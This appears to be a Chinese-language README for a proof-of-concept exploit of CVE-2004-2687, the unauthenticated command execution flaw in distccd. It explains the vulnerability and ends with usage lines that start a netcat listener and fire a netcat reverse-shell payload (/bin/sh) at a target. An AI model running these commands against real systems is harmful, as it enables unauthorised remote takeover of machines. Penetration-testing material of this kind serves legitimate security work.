🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ 升级到Python3
概述
该仓库包含针对 distccd 漏洞(标识为 CVE-2004-2687)的概念验证 (PoC) 利用程序。该漏洞存在于 distccd 守护进程中,该进程是 distcc 分布式 C/C++ 编译系统的一部分。当配置不当时,distccd 允许远程攻击者无需任何身份验证即可在服务器上执行任意命令。
漏洞详情
distcc 旨在将编译任务分布到多台机器上,以加速构建过程。然而,如果 distccd 守护进程未得到适当保护,它会暴露远程代码执行 (RCE) 漏洞。这是因为守护进程监听网络端口并接受来自任何客户端的命令,允许它们以运行守护进程的用户身份在服务器上执行 shell 命令。
该漏洞已被分配 CVE-2004-2687,影响 3.1 之前的 distccd 版本。一旦被利用,攻击者可以获取对易受攻击机器的 shell 访问权限,从而导致整个系统可能被攻陷。
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
漏洞:

利用:
